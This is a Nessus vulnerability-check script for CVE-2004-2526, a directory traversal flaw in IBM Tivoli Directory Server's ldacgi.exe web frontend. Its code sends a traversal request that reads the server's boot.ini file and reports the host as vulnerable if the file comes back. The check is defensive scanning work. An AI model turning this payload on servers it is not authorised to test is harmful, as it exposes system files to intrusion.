#
# (C) Tenable Network Security
#

if(description)
{
 script_id(14191); 
 script_cve_id("CVE-2004-2526");
 script_bugtraq_id(10841);
 script_version ("$Revision: 1.5 $");

 name["english"] = "Tivoli LDACGI Directory Traversal";
 script_name(english:name["english"]);

 desc["english"] = "
Synopsis :

The remote web server is prone to a directory traversal attack. 

Description :

The remote host is running IBM Tivoli's Directory Server, a
lightweight LDAP server with a web frontend. 

There is a directory traversal issue in the web frontend of this
program, specifically in the 'ldacgi.exe' CGI.  An attacker may
exploit this flaw to read arbitrary files on the remote system with
the privileges of the web server. 

See also : 

http://www.oliverkarow.de/research/IDS_directory_traversal.txt
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1311.html
http://www-1.ibm.com/support/docview.wss?uid=swg1IR53631

Solution : 

Apply 3.2.2 Fix Pack 4 / 4.1 Fix Pack 3 or later.

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";
 script_description(english:desc["english"]);

 summary["english"] = "IBM Tivoli Directory Traversal";
 script_summary(english:summary["english"]);

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2004-2007 Tenable Network Security");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);

 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

req = http_get(item:"/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252", port:port);
res = http_keepalive_send_recv(port:port, data:req);

if ( res == NULL ) exit(0);
   
if ("[boot loader]" >< res )
{
  security_warning(port);
  exit(0);
}
